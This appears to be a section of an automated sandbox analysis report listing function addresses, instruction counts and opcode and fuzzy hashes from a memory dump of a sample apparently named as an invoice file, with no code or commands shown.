                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                        • Instruction ID: 522faf9bc38b461610a75d912b4a202df0a5363fd366b42b0ee7d2b4cab2e991
                                                                                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                        • Instruction Fuzzy Hash: 30418072A04251DFDB11DE5AC4C07BAB7B1EF50710F1580BAEA898B240D637ED40EB92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF09AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b5df87e505bbdf8465587a47113558d228409d8cd6772a32546d055906b78f82
                                                                                                                                        • Instruction ID: 903a012f854267cc310425706ef98dfbdb948b8229792fa881ffbf0fba8742e9
                                                                                                                                        • Opcode Fuzzy Hash: b5df87e505bbdf8465587a47113558d228409d8cd6772a32546d055906b78f82
                                                                                                                                        • Instruction Fuzzy Hash: E6417C71A00709EFD321CF18C840B66B7E4FF54714F20856AE589CB262EB75E942DB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01020710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                        • Instruction ID: cfba3b9ed7f8dc8b3def5455e2b3485ec779fc1c9b09d166b2b80cb7176f7d8c
                                                                                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                        • Instruction Fuzzy Hash: 2C414B71A00715EFDB24CF98C980AAABBF8FF18700B10496DE596D7695E370EA44CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 187b87aa089298ede9e6d274062b766170d466b550cbf20b978c927229d41da5
                                                                                                                                        • Instruction ID: 26c32b8ba630e29b3a4139b07e64010b78fe12fcf82adca2468e6597898032b0
                                                                                                                                        • Opcode Fuzzy Hash: 187b87aa089298ede9e6d274062b766170d466b550cbf20b978c927229d41da5
                                                                                                                                        • Instruction Fuzzy Hash: 5541E2B2901708CFCB61EF69D940B69B7F1FF54724F1082AAD6568B2B1EB309941EF41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b18a96f80d865f3a9f8435249a0c0b6931948e276162927a20f108f8f471f4d2
                                                                                                                                        • Instruction ID: 6946b8be1759fb22df96a3a8beff5022a862e21562f9a6aac39362c7039023ad
                                                                                                                                        • Opcode Fuzzy Hash: b18a96f80d865f3a9f8435249a0c0b6931948e276162927a20f108f8f471f4d2
                                                                                                                                        • Instruction Fuzzy Hash: 9B3188B1A00355DFEB52CFA8C540799BBF4FB09728F2081AED159EB291D7369902CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010707C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 83db3ca14ebb4372e2aa0fff5869bfe8cc72800caaedb75c2c9ca3d9ca5b2325
                                                                                                                                        • Instruction ID: 6df40d4740d04fcc524dc9858f4374abeb5c96040dbedee631efd937e7e9c8e3
                                                                                                                                        • Opcode Fuzzy Hash: 83db3ca14ebb4372e2aa0fff5869bfe8cc72800caaedb75c2c9ca3d9ca5b2325
                                                                                                                                        • Instruction Fuzzy Hash: 58416BB2A04345ABD360DF29C845B9BBBE8FF88614F008A2EF5D8C7255D7749904CB92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010705A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7014545ad2a363e0180ab47ded246c2e4e21668824779269844c4a3f765652a7
                                                                                                                                        • Instruction ID: 2ab9f8a9b78ee3c9412e4b91e889cf0da8fc32062200bc2d348354863bdf27ac
                                                                                                                                        • Opcode Fuzzy Hash: 7014545ad2a363e0180ab47ded246c2e4e21668824779269844c4a3f765652a7
                                                                                                                                        • Instruction Fuzzy Hash: C541E672A046469FD311DF28C850AAAB7E9FFC9700F144619F9D49B684E730E904C7AA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF4859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 87dc64cf2518b5b68b20730d999b4a2d83c1ac342875e60e20982cfffac0fe60
                                                                                                                                        • Instruction ID: 4b20439a32570452d7ddd3239867d6a2f9c3bda635ac122e08c028a005103418
                                                                                                                                        • Opcode Fuzzy Hash: 87dc64cf2518b5b68b20730d999b4a2d83c1ac342875e60e20982cfffac0fe60
                                                                                                                                        • Instruction Fuzzy Hash: 5C41CF307003098BD735DF28D884B3BBBE9AF90764F14442DEA918B2A1DBB5E941DB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010002E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                        • Instruction ID: 0daf838fff1372f3cdedf447b0d478e248b0686c8631e4fad4f2e8a297e2765d
                                                                                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                        • Instruction Fuzzy Hash: FF310931604648AFEB639B68CC44BEFBFE9EF44390F0481A5F895D7396D6749884CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF4260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e4c7d5d8f2142c60675beee46c5d97db0b9a7ce59c90fe9c34c088bc6ab55388
                                                                                                                                        • Instruction ID: 4e220e72c585a677c510fad84a51250840b9db79c4f4890d36628a5372affc2a
                                                                                                                                        • Opcode Fuzzy Hash: e4c7d5d8f2142c60675beee46c5d97db0b9a7ce59c90fe9c34c088bc6ab55388
                                                                                                                                        • Instruction Fuzzy Hash: 2041AF31100B499FD762CF28C881FEB7BE9BF49754F108469EA998B261C774E844EB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0106EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c3db369b2a6e6242811a9bb9a5786b47e1f0d0b44da767b8aede2efbeae01f5f
                                                                                                                                        • Instruction ID: c8ff6e2ab295e179d506c232312341baf57f0040149e1b9b0736c59607873fe5
                                                                                                                                        • Opcode Fuzzy Hash: c3db369b2a6e6242811a9bb9a5786b47e1f0d0b44da767b8aede2efbeae01f5f
                                                                                                                                        • Instruction Fuzzy Hash: BF31AE757017869BF323DB6CCD48BA67BDCBB51B44F1900E0ABC59B6D2DB28D841C224
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010B61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 249c530420b57aab14b4efe6cfb3df9b508f6d1776361173156aefe605a8b71e
                                                                                                                                        • Instruction ID: 18d70992c80ef55fef6ce448b0190ec4fcdb44250210fcb95699ce275596275f
                                                                                                                                        • Opcode Fuzzy Hash: 249c530420b57aab14b4efe6cfb3df9b508f6d1776361173156aefe605a8b71e
                                                                                                                                        • Instruction Fuzzy Hash: B831C475A0055AABEB15DF98CC80FEEB7B9FB44B40F454169E980EB284D771ED00CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0109483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f1e8510feeb5cbd2ff92e95dda4727d0ab43f8100afd3405d5f018cd67308c6e
                                                                                                                                        • Instruction ID: fc23e912a671ed37f5855e03e8e95bda7d28c76d34bd30c805b4cb9ed47cf6e7
                                                                                                                                        • Opcode Fuzzy Hash: f1e8510feeb5cbd2ff92e95dda4727d0ab43f8100afd3405d5f018cd67308c6e
                                                                                                                                        • Instruction Fuzzy Hash: 75315276A4012DABCF61DF54DD88BDEBBF9AB98350F1000E5A548E7250CA709E929F90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0101EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a5cb2fc88d18ca559c63cecbba9a183339552962d9ae1995886bd1078c77a8e0
                                                                                                                                        • Instruction ID: 5c980498daa1964ea8db5da9735a80cea8d8e607293cffb1ca29426fcd33a0b1
                                                                                                                                        • Opcode Fuzzy Hash: a5cb2fc88d18ca559c63cecbba9a183339552962d9ae1995886bd1078c77a8e0
                                                                                                                                        • Instruction Fuzzy Hash: 5731D772E00219AFDB62DFA9CC80AAFBBF9FF44750F014465E995D7254D6789E008BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010B60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3103cd33255fcf4c5ccf82246af7c3915a7977275aa4e01179d9bb39b767c20b
                                                                                                                                        • Instruction ID: 909af2f9262dc672e63a5b4e39a7b261ce8080663973977bf688c0d186ba78e4
                                                                                                                                        • Opcode Fuzzy Hash: 3103cd33255fcf4c5ccf82246af7c3915a7977275aa4e01179d9bb39b767c20b
                                                                                                                                        • Instruction Fuzzy Hash: 3331E871600606AFD7139FAAC890BEFB7F9AF44754F044469E585DF382DA32DC008B90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF07AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 399a582b5c816b1407e62e6c8e2f6a9dcef8d1005dddd8513383953ecde9183e
                                                                                                                                        • Instruction ID: c3cce77d52bf45dad4225144ca17f0a920e51188e1b95eada1c9bce482e975ff
                                                                                                                                        • Opcode Fuzzy Hash: 399a582b5c816b1407e62e6c8e2f6a9dcef8d1005dddd8513383953ecde9183e
                                                                                                                                        • Instruction Fuzzy Hash: CE31F472A04619DBC722DE24C880E7BBBE5AF947A0F014528FE559B322DE34DC01E7E1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF8550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b959beeb84ee6dc0fdcbd2603c6efe4c29b190717a54e625300c28c99ec8aea9
                                                                                                                                        • Instruction ID: 42fea5ff82b8f827a4802afb5c086d441e8f6b46b51fd1ecdda256944b90db25
                                                                                                                                        • Opcode Fuzzy Hash: b959beeb84ee6dc0fdcbd2603c6efe4c29b190717a54e625300c28c99ec8aea9
                                                                                                                                        • Instruction Fuzzy Hash: 4F318972A09301CFE7A0CF19C840B2BB7E5AF98760F0849ADF98497261D770E844CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                        • Instruction ID: 083071820f48646453b14f4aea912fc7ba97233518bef589396ce76067619fd9
                                                                                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                        • Instruction Fuzzy Hash: A7312AB2B00B11EFD765CF69CD40B57BBF8BB48A50F04496DE59AC3A51EA30E900CB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0109EBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f7cef14816ca71e9d088c776d897647e0632248e3b29307247ba217ca3d31993
                                                                                                                                        • Instruction ID: 8a82646d49fe1b6ec82f28978f8f919ed5e3ce32e6c2acf49c9aa0298fa18542
                                                                                                                                        • Opcode Fuzzy Hash: f7cef14816ca71e9d088c776d897647e0632248e3b29307247ba217ca3d31993
                                                                                                                                        • Instruction Fuzzy Hash: 7F31DCB15093858FCB21DF1AC45485ABBF1FF89204F4449AEE4C89B351D332ED42CB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0101438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dd8f04f2e15c12291db10d5bbcbc118a6be128a2417140dbeacdf914b4d6c8c6
                                                                                                                                        • Instruction ID: c1d4bc89b98a68eac7bbc93e83c770d3e5f25ec3540e25b104aae7b27ae55471
                                                                                                                                        • Opcode Fuzzy Hash: dd8f04f2e15c12291db10d5bbcbc118a6be128a2417140dbeacdf914b4d6c8c6
                                                                                                                                        • Instruction Fuzzy Hash: 9231E831B002069FD724DFB9C980AAFB7FAAF94704F008529D5C5D7268DB39E941CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FECB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                        • Instruction ID: 0b30a6db905c20fdcf61487f7de8f4bf827584f583a29a481d0f3231c86a683d
                                                                                                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                        • Instruction Fuzzy Hash: 32212772E4029AABDB019BB98841BEFBBB5AF40750F158075A996EB240E270D90187E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEC156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b703a42f792d13720055dac9277c63363b8274f2e8bcfda4592a9ce1941d92c1
                                                                                                                                        • Instruction ID: 01cfe8c7e3a99f1cc8c695d24f6b347c790337a661d460206a4736958f542c1e
                                                                                                                                        • Opcode Fuzzy Hash: b703a42f792d13720055dac9277c63363b8274f2e8bcfda4592a9ce1941d92c1
                                                                                                                                        • Instruction Fuzzy Hash: 463129B15002018BD721EF58CC81BA977F4BF64714F5481B9E9C59F382EA39D982CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010AC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                        • Instruction ID: 6598adbc3765fdb2ff99c98101696c9ff918f0725f37233df4ebfde7832faa56
                                                                                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                        • Instruction Fuzzy Hash: 61212D36600656A6EB15ABD58D00AFABBB4EF80710F81C01BFAD58B591EF34DD40C364
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEE420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4bd8bc7550a25b47d09a8b798d70aac8d2246f780d4288aab3fe16c4d3b99087
                                                                                                                                        • Instruction ID: b5b58fdef787fb4ff51ab40c9bff1207379b6606d3003fbf53eaf7309e32d422
                                                                                                                                        • Opcode Fuzzy Hash: 4bd8bc7550a25b47d09a8b798d70aac8d2246f780d4288aab3fe16c4d3b99087
                                                                                                                                        • Instruction Fuzzy Hash: 3631F136A0066C9BDB31DF15DC41FEEB7B9AB15750F0100A1E685AB2D0D674AE80AFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01024588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                        • Instruction ID: 98ef100b9653f3301cb9333891c8c3412be028b1bb2543680e4a27ba41262e14
                                                                                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                        • Instruction Fuzzy Hash: 99217F32A00619EFCB25CFA8C984A8EBBF5FF4C714F508069EE55DB241D671EE058B91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010244B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
